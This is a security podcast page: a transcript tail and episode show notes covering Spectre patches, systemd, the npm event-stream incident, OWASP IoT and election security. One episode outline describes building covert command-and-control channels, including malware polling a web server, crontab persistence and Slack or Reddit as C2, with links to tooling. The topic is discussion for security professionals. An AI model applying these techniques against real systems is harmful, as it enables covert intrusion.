Okay, awesome. Cool. Before we go, we have a store. If you want to go buy a T shirt for the Brakeing Down Security logo, you know, you can definitely go do that or get one with Miss Berlin's face on it. Which is very weird but it's still very cool I'm going to probably by pink one here in the next few weeks and thank you to our patrons people who help support the podcast but donating some money helps pay for hosting pays for the time that we're doing this also we're looking into adding some possible transcription services we've gotten a couple emails from people who are saying they want to get transcriptions of us saying "uh, um, ah" lot so I actually actually it was a gentleman by the name of Willie I think was said head hearing difficulties so he wanted to know if we had a transcription of the podcast and I feel really bad because I'm like I don't know how to reply to him and say I you know we're just a little mom and pop shop here so we're looking at transcription services maybe something like Mechanical Turk or there was one called otter.ai that we're we're looking at to maybe kind of make it better for people to hear these things
Brian "Noid" Harden 45:26
I'm actually actually suffer from degenerative hearing loss. I'm slowly going deaf myself
Bryan Brake 45:31
I've got tinnitus is from the Navy
Brian "Noid" Harden 45:32
same here. It's permanent and ongoing. And just yeah, it's like I feel for him. Yep. And hopefully transcriptions will be a thing at some point. Yeah, god's I hope so. Yeah, I mean, other than the US and about 800 times during podcast I apologize for that. But yeah, so we're, we're trying to look into that if if we can make it work we will we will do our utmost to make the podcast as available as possible to everybody. So in end up to be we have to hire somebody, he'll do it for us. So that that may be another thing, which means will need more pot Patreon money, you know that kind of thing. So if you're interested in getting full transcripts we may make that possible if we can get another maybe 20 to 30 people a 20-30 bucks a month. So but we do appreciate that the tips the you know we call them tips because you're helping to support the podcast and helping us get this out. And yeah, so for Miss Berlin who's not here sadly. And she's going to be kicking yourself because this was a really awesome podcast and Mr. Boettcher. This is Brakeing Down Security from a world headquarters here in Seattle. Have a great week. Be nice to another. Please take care of yourselves because you're the only you have and we'll talk again soon.
Brian Boettcher 46:45
Bye bye
Brian "Noid" Harden 46:46
Bye Internet people.
Transcribed by https://otter.ai
Published on: March 24, 20192019-010-Zach_Ruble-building_a_better_cheaper_C2_infra
Shout-out to Thomas…
Tried to meetup while at SEA comic-con
Patreon
Log-MD
Hacker’s Health - Ms. Roddie is at TROOPERS (Ms. Berlin?)
4 podcasts?
SpecterOps Training / workshopCon - https://www.workshopcon.com/events
Zach Ruble- @sendrublez
C2 infra using Public WebApps
TARCE - Teaching Assistant RCE(?) - they run your code every week, don’t check for backdoors before running it...
C2 Basics
Local HTTPd server (bashfile)
Python scrapes web server
3 components
-Servers
-Communication channels
-Malware and client
-
3 Requirements of a C2
-victim receives commands
-Vic executes
-Send results back
Web server serving a static file
Malware on machine scraping site with python requests and executing it as commands.
Crontab @reboot
State change = change the text field
Long haul/short haul server
Long haul - regain persistence
Short haul - sends commands to victims
Slack as C2 - Blends in to the Env
Send and receive messages
Using Real Time Messaging API
https://3xpl01tc0d3r.blogspot.com/2018/06/how-to-use-slack-as-c2-sever.html
https://link.springer.com/chapter/10.1007/978-3-319-27137-8_24
https://glitch.com/
Https://github.com/bkup/SlackShell
Reddit as a C2
“Reddit Rising”
Glitch.com
Serverless platform
Using Google search results as
Would Google Algos see odd behavior of hundreds of hosts searching for the same thing?
Log file analysis?
How can we protect against this?
C2 News (If we go short) :
https://www.zdnet.com/article/outlaws-shellbot-infects-servers-for-monero-mining
Automating OSINT
https://twitter.com/jms_dot_py
http://www.automatingosint.com/blog/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 18, 20192019-009- Log-MD story, Noid, communicating with Devs and security people-part1
Log-MD story (quick one) (you’ll like this one, Mr. Boettcher)
SeaSec East meetup
"Gabe"
New Slack Moderator (@cherokeeJB)
Shoutout to “Jerry G”
Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407
www.Workshopcon.com/events and that we're looking for BlueTeam trainers please
Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet
Noid - @_noid_
Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3
Slides (PDF)
Security view was a bit myopic?
“What do we win by playing?”
Cultivating relationships (buy lunch, donuts, etc)
Writing reports
Communicating findings that resonate with developers and management
Often pentest reports are seen by various facets of folks
Many levels of competency (incompetent -> super dev/sec)
Communicating risk? Making bugs make sense to everyone…
The three types of power:
https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 12, 20192019-008-windows retpoline patches, PSremoting, underthewire, thunderclap vuln
BrakeingDownIR show #10
GrumpySec appearance?
https://support.microsoft.com/en-us/help/4482887/windows-10-update-kb4482887
“Microsoft has added support for the /Qspectre flag to Visual C++ which currently enables some narrow compile-time static analysis to identify at-risk code sequences related to CVE-2017-5753 and insert speculation barrier instructions. This flag has been used to rebuild at-risk code in Windows and was released with our January 2018 security updates. It is important to note, however, that the Visual C++ compiler cannot guarantee complete coverage for CVE-2017-5753 which means instances of this vulnerability may still exist.’
Retpoline = “Return Trampoline”
“That’s because when using return operations, any associated speculative execution will 'bounce' endlessly.”
https://www.tomshardware.com/news/retpoline-patch-spectre-windows-10,37958.html
Cool site (Andrei) *long time podcast supporter*
UndertheWire.tech - powershell wargame
---
https://www.howtogeek.com/117192/how-to-run-powershell-commands-on-remote-computers/
https://blogs.technet.microsoft.com/askperf/2012/02/17/useful-wmic-queries/
Caveats:
Network connection you’re on must be set to “private”, not public
WinRM service has to be enabled on both the local and remote hosts (at least, I think so --brbr)
https://www.engadget.com/2019/02/27/dow-jones-watchlist-leaked/
http://time.com/5349896/23andme-glaxo-smith-kline/
https://int3.cc/products/facedancer21 - USB
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 4, 20192019-007-bsides_seattle_recap-new_phishing_vector-Kernel_use_after_free_vuln
Bsides Seattle recap (Bryan)
New phishing technique to bypass email filters-
https://www.helpnetsecurity.com/2019/02/20/phishers-new-trick-for-bypassing-email-url-filters/
https://en.wikipedia.org/wiki/Office_Open_XML_file_formats#Relationships
Use after free in Linux kernel:
https://www.webopedia.com/TERM/U/use-after-free.html
https://cwe.mitre.org/data/definitions/416.html
https://www.acodersjourney.com/top-20-c-pointer-mistakes/
https://www.kernel.org/doc/html/v4.14/dev-tools/kasan.html
https://nvd.nist.gov/vuln/detail/CVE-2019-8912
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 25, 20192019-006: CSRF, XSS, infosec hypocrites, and the endless cycle
https://www.zdnet.com/article/google-working-on-new-chrome-security-feature-to-obliterate-dom-xss/
https://www.owasp.org/index.php/DOM_Based_XSS
CSRF - confused deputy https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Google Cloud Platform - tip tricks, stuff ms. berlin learned
Layer 8 conference - Rhode Island’’
I was wrong…..cycles don’t sync --Ms. Berlin https://health.clevelandclinic.org/myth-truth-period-really-sync-close-friends/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 18, 20192019-005: Security Researcher attack, disabling SPECTER, and Systemd discussion
SpecterOps Class: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-boston-june-2019-tickets-54970050902
https://www.secjuice.com/security-researcher-assaulted-ice-atrient/
Tweet of application teardown: https://twitter.com/duniel_pls/status/1093565709630824448
https://www.zdnet.com/article/linux-kernel-gets-another-option-to-disable-spectre-mitigations/
https://capsule8.com/blog/exploiting-systemd-journald-part-1/
Segue from systemd/journald into:
“Super daemon for all daemons”
Replaced things like sysvinit, rc.d, and even inetd
Lennart Poettering and Kay Sievers
Systemd (PID1)
Configured using only text files
.service
.device
.swap
.timer (.service file of the same time must exist)
‘Transient timers can be created’
https://wiki.archlinux.org/index.php/Systemd/Timers
/etc/systemd/system/foo.timer
[Unit]
Description=Run foo weekly and on boot
[Timer]
OnBootSec=15min
OnUnitActiveSec=1w
[Install]
WantedBy=timers.target
Logs are in binary format
Cgroups - control groups
Isolates resource usage (CPU, memory, disk I/O, network, etc) of processes
Bound by the same criteria
Used a lot of places (hadoop, k8s, docker, LXC)
http://without-systemd.org/wiki/index.php/Arguments_against_systemd
https://www.freedesktop.org/wiki/Software/systemd/TipsAndTricks/
https://lwn.net/SubscriberLink/777595/a71362cc65b1c271/
http://0pointer.de/blog/projects/systemd.html
https://en.wikipedia.org/wiki/Systemd
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 11, 20192019-004-ShmooCon, and Bsides Leeds discussion, Facetime bug (with update), a town for ransom
Facetime bug update: https://www.cnbc.com/2019/02/01/apple-facetime-bug-fix-and-apology.html
ShmooCon discussion
Bsides Leeds discussion
@largeCardinal
@bsidesLeeds
https://www.bbc.co.uk/news/uk-scotland-edinburgh-east-fife-47028244
https://www.theverge.com/2018/12/28/18159110/centurylink-internet-911-outage-fcc-investigating
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 4, 20192019-003-Liz Rice, creating processes to shift security farther left in DevOps
BIO:
Liz Rice is the Technology Evangelist with container security specialists Aqua Security, where she also works on container-related open source projects including kube-hunter and kube-bench. She was Co-Chair of the CNCF’s KubeCon + CloudNativeCon 2018 events in Copenhagen, Shanghai and Seattle, and co-author of the O’Reilly Kubernetes Security book. She has a wealth of software development, team, and product management experience from working on network protocols and distributed systems, and in digital technology sectors such as VOD, music, and VoIP. When not building startups and writing code, Liz loves riding bikes in places with better weather than her native London.
Liz Rice (@lizrice on Twitter) https://www.lizrice.com/
https://medium.com/@lizrice/non-privileged-containers-based-on-the-scratch-image-a80105d6d341
https://www.cloudops.com/2018/10/takeaways-from-liz-rice-pop-up-meetup-on-container-security/
https://thenewstack.io/cloud-native-security-patching-with-devops-best-practices/
https://changelog.com/gotime/56 - podcast with Liz
https://kubernetes-security.info - co-author of O’Reilly Kubernetes security book
https://www.slideshare.net/Docker/dont-have-a-meltdown - Liz Rice/Justin Cormack slides
https://www.bbc.com/news/technology-41753022 - NHS ransomware issue in 2017
https://docs.docker.com/config/containers/container-networking/ - docker portmapping
https://techbeacon.com/9-practical-steps-secure-your-container-deployment
If security needs to “Shift Left”, what can devs do to accommodate the change?
Everyone will have to make adjustments, not just security… right?
Reverse uptime…
Forgotten data?
Test Driven Development
Why do we need security as far left?
“We don’t patch, we just push a fix, ”
“We’ll fix it in production…”
Or we pump more resources to overcome perf issues
Is there time for code reviews?
“We don’t need change management…”
https://testssl.sh - @drwetter
Automation: How does security that solve security issues?
Do Microservices solve everything?
What don’t they solve?
What does security need to embrace to make the shift less painful?
What does development need to embrace to make the shift less painful?
Cause security wants to get in there…
There are already DevSecOps processes a-plenty and many . Why aren’t companies adopting them?
Maturity?
Lack of resources?
Negligent devs - how can you ignore the news of breaches?
Setting Goals
“Start Small” - what’s an example of a small goal?
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 28, 20192019-002-part 2 of the OWASP IoT Top 10 with Aaron Guzman
intro
CFP for Bsides Barcelona is open! https://bsides.barcelona
Aaron Guzman: @scriptingxss
https://www.computerweekly.com/news/252443777/Global-IoT-security-standard-remains-elusive
https://www.owasp.org/index.php/IoT_Attack_Surface_Areas
OWASP SLACK: https://owasp.slack.com/
https://www.owasp.org/images/7/79/OWASP_2018_IoT_Top10_Final.jpg
Team of 10 or so… list of “do’s and don’ts”
Sub-projects? Embedded systems, car hacking
Embedded applications best practices? *potential show*
Standards: https://xkcd.com/927/
CCPA: https://en.wikipedia.org/wiki/California_Consumer_Privacy_Act
California SB-327: https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=201720180SB327
How did you decide on the initial criteria?
- Weak, Guessable, or Hardcoded passwords
- Insecure Network Services
- Insecure Ecosystem interfaces
- Lack of Secure Update mechanism
- Use of insecure or outdated components
- Insufficient Privacy Mechanisms
- Insecure data transfer and storage
- Lack of device management
- Insecure default settings
- Lack of physical hardening
2014 OWASP IoT list: https://www.owasp.org/index.php/Top_10_IoT_Vulnerabilities_(2014)
2014 list:
- I1 Insecure Web Interface
- I2 Insufficient Authentication/Authorization
- I3 Insecure Network Services
- I4 Lack of Transport Encryption
- I5 Privacy Concerns
- I6 Insecure Cloud Interface
- I7 Insecure Mobile Interface
- I8 Insufficient Security Configurability
- I9 Insecure Software/Firmware
- I10 Poor Physical Security
BrakeSec Episode on ASVS http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3
OWASP SLACK: https://owasp.slack.com/
What didn’t make the list? How do we get Devs onboard with these?
How does someone interested get involved with OWASP Iot working group?
https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-security-best-practices
https://www.iiconsortium.org/pdf/SMM_Description_and_Intended_Use_2018-04-09.pdf
https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 22, 2019
2019-001: OWASP IoT Top 10 discussion with Aaron Guzman
Aaron Guzman: @scriptingxss
https://www.computerweekly.com/news/252443777/Global-IoT-security-standard-remains-elusive
https://www.owasp.org/index.php/IoT_Attack_Surface_Areas
OWASP SLACK: https://owasp.slack.com/
https://www.owasp.org/images/7/79/OWASP_2018_IoT_Top10_Final.jpg
Team of 10 or so… list of “do’s and don’ts”
Sub-projects? Embedded systems, car hacking
Embedded applications best practices? *potential show*
Standards: https://xkcd.com/927/
CCPA: https://en.wikipedia.org/wiki/California_Consumer_Privacy_Act
California SB-327: https://leginfo.legislature.ca.gov/faces/billNavClient.xhtml?bill_id=201720180SB327
How did you decide on the initial criteria?
- Weak, Guessable, or Hardcoded passwords
- Insecure Network Services
- Insecure Ecosystem interfaces
- Lack of Secure Update mechanism
- Use of insecure or outdated components
- Insufficient Privacy Mechanisms
- Insecure data transfer and storage
- Lack of device management
- Insecure default settings
- Lack of physical hardening
2014 OWASP IoT list: https://www.owasp.org/index.php/Top_10_IoT_Vulnerabilities_(2014)
2014 list:
- I1 Insecure Web Interface
- I2 Insufficient Authentication/Authorization
- I3 Insecure Network Services
- I4 Lack of Transport Encryption
- I5 Privacy Concerns
- I6 Insecure Cloud Interface
- I7 Insecure Mobile Interface
- I8 Insufficient Security Configurability
- I9 Insecure Software/Firmware
- I10 Poor Physical Security
BrakeSec Episode on ASVS http://traffic.libsyn.com/brakeingsecurity/2015-046_ASVS_with_Bill_Sempf.mp3
OWASP SLACK: https://owasp.slack.com/
What didn’t make the list? How do we get Devs onboard with these?
How does someone interested get involved with OWASP Iot working group?
https://docs.microsoft.com/en-us/azure/iot-fundamentals/iot-security-best-practices
https://www.iiconsortium.org/pdf/SMM_Description_and_Intended_Use_2018-04-09.pdf
https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf
Published on: January 14, 2019
2018-045: end of the year podcast!
Join the combined forces of:
Jerry Bell (@maliciousLink) from Defensive Security Podcast! (https://defensivesecurity.org/)
Bill Gardner from the "RebootIt! podcast"
https://itunes.apple.com/us/podcast/reboot-it/id1256466198?mt=2
Ms. Berlin and Bryan Brake for the end of the year podcast!
BrakeSec Podcast = www.brakeingsecurity.com
RSS: https://www.brakeingsecurity.com/rss
Published on: December 27, 20182018-044: Mike Samuels discusses NodeJS hardening initiatives
Mike Samuels
https://github.com/mikesamuel/attack-review-testbed
https://nodejs-security-wg.slack.com/
Hardening NodeJS
Speaking engagement talks:
A Node.js Security Roadmap at JSConf.eu - https://www.youtube.com/watch?v=1Gun2lRb5Gw
Improving Security by Improving the Framework @ Node Summit - https://vimeo.com/287516009
Achieving Secure Software through Redesign at Nordic.js - https://www.facebook.com/nordicjs/videos/232944327398936/?t=1781
What is a package: (holy hell, why is this so complicated?)
A package is any of:
- a) a folder containing a program described by a package.json file
- b) a gzipped tarball containing (a)
- c) a url that resolves to (b)
- d) a
@ that is published on the registry with © - e) a
@ that points to (d) - f) a
that has a latest tag satisfying (e) - g) a git url that, when cloned, results in (a).
https://medium.com/@jsoverson/exploiting-developer-infrastructure-is-insanely-easy-9849937e81d4
https://blog.risingstack.com/node-js-security-checklist/
https://www.npmjs.com/package/trusted-types
https://github.com/WICG/trusted-types/issues/31
Published on: December 18, 20182018-043-Adam-Baldwin, npmjs Director of Security, event stream post mortem, and making your package system more secure
Adam Baldwin (@adam_baldwin)
Director of Security, npm
https://foundation.nodejs.org/
https://spring.io/understanding/javascript-package-managers
Role in the NodeJS project
Advisory? Active role? Maintain security modules?
Are there any requirements to being a dev?
Are there different roles in the NodeJS environment?
Is there any review of system sensitive packages? (or has that ship sailed…)
Discussion of timeline from NodeJS security team
When were you notified? (or were you notified at all?)
What steps were taken to fix the issue?
Lessons learned?
Official npm security policy: https://www.npmjs.com/policies/security (good stuff!)
Event-stream (initial bug report): https://github.com/dominictarr/event-stream/issues/116
Only affected bitcoin Wallets from ‘Copay’
“Cue relief, mixed with frustration, for anyone not targeted. Developer Chris Northwood wrote :
We’ve wiped our brows as we’ve got away with it, we didn’t have malicious code running on our dev machines, our CI servers, or in prod. This time.” (
https://medium.com/@jsoverson/exploiting-developer-infrastructure-is-insanely-easy-9849937e81d4
“The damage this could have caused is incredible to think about. The projects that depend on this aren’t trivial either, Microsoft’s original Azure CLI depends on event-stream! Think of the systems that either develop that tool or run that tool. Each one of those potentially had this malicious code installed.”
https://thehackernews.com/2018/11/nodejs-event-stream-module.html
“The malicious code detected earlier this week was added to Event-Stream version 3.3.6, published on September 9 via NPM repository, and had since been downloaded by nearly 8 million application programmers.”
https://www.analyticsvidhya.com/blog/2018/07/using-power-deep-learning-cyber-security/
Hacker News (with comments): https://news.ycombinator.com/item?id=18534392
Official npm blog post: https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident
https://blog.npmjs.org/post/175824896885/incident-report-npm-inc-operations-incident-of
2017 package/user stats: https://www.linux.com/news/event/Nodejs/2016/state-union-npm
According to npmjs.org: over 800,000 packages (854,000 packages, 7 million+ individual versions)
Dependency hell in NodeJS:
https://blog.risingstack.com/controlling-node-js-security-risk-npm-dependencies/
“Roughly 76% of Node shops use vulnerable packages, some of which are extremely severe; and open source projects regularly grow stale, neglecting to fix security flaws.”
History of NodeJS security issues:
ESLINT: https://nodesource.com/blog/a-high-level-post-mortem-of-the-eslint-scope-security-incident/
Left-pad: https://www.theregister.co.uk/2016/03/23/npm_left_pad_chaos/
How to ensure this type of issue doesn’t happen again? (or is that possible, considering the ecosystem?)
What can devs, blueteams, or companies that live and die by NodeJS do to increase security, or assist in making NPM Security team’s job easier?
What the responsibility is of consumers of open source?
What can be done to ensure vetting for ‘important’ packages?
Can someone manage turnover? (or is that ship sailed?)
Security scanners:
https://geekflare.com/nodejs-security-scanner/
https://techbeacon.com/13-tools-checking-security-risk-open-source-dependencies-0
Threat assessment or ‘what could go wrong in the future’?
Bad code
“Trust issues”
Repo corruption
Hijacking packages
Keep up to date on NodeJS security issues:
https://nodejs.org/en/security/
https://groups.google.com/forum/#!forum/nodejs-sec
^ this is great for node, but if you want to stay up to date with security advisories in the ecosystem?
npmjs.com/advisories or @npmjs on twitter
https://rubysec.com/ -Ruby security group
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: December 11, 20182018-042-Election security processes in the state of Ohio
Where in the world is Ms. Amanda Berlin?
Keynoting hackerconWV
Election Security
Cuyahoga County:
Intro: Jeremy Mio (@cyborg00101
Name?
Why are you here?
Discussing Ohio does election operations.
Walk through the process
Pre-Elections
Elections Night
Post Elections
All about the C.I.A.
Votes must be confidential
Votes must not be compromised (integrity)
Voting should be available and without outage
Did a tabletop exercise with all counties in Ohio (impressive!)
Gamified, using role-reversal
Points based system
Different technology has different point values
Physical security/chain of custody
Retention
EI-ISAC - election infra ISAC
https://www.cisecurity.org/services/albert/ - Albert system
https://www.cisecurity.org/best-practices-part-1/ - election security best practices
How does the Ohio election process stack up against other states?
Media Perception in Elections Hacking and threats
11 year olds ‘hacking election’
Yes, good for a new article title
Goes to show how easy it is to actually hack systems
Train someone on SQLI, pwn the things
Elections Security Operations and Preparation
Technology types
Ballot
Booths
Mail-in ballots
Securing election infra
What can be done to make it more secure?
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
